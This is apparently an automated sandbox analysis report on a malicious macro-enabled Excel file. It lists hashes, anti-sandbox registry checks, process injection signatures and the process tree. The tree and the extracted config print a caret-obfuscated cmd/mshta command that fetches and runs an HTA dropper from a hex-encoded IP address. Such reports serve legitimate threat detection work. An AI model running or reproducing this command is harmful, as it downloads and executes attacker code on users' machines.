Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 22:06
Behavioral task
behavioral1
Sample
c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm
Resource
win10-en-20211208
0 signatures
0 seconds
General
-
Target
c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm
-
Size
115KB
-
MD5
383a3c7cdb5a9070656164e0b90e41a5
-
SHA1
af0b4eedbd1c6d85705c26ebb3955f8b35a8cea8
-
SHA256
c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0
-
SHA512
c37692e7c9a60fcda701450a620f09c0c95db6e6a1ee3188c2897d09a621d80e3f0fb539506f458ab5c20a7e5adc8adfbe2bcad0860c4bb9484f6292eb391b9c
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
http://0x5cff39c3/sec/se1.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2180 2744 cmd.exe 67 -
Blocklisted process makes network request 1 IoCs
flow pid Process 41 2988 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2744 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 20 IoCs
pid Process 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE 2744 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2744 wrote to memory of 3084 2744 EXCEL.EXE 69 PID 2744 wrote to memory of 3084 2744 EXCEL.EXE 69 PID 2744 wrote to memory of 2180 2744 EXCEL.EXE 71 PID 2744 wrote to memory of 2180 2744 EXCEL.EXE 71 PID 2180 wrote to memory of 2988 2180 cmd.exe 73 PID 2180 wrote to memory of 2988 2180 cmd.exe 73
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3084
-
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/se1.html3⤵
- Blocklisted process makes network request
PID:2988
-
-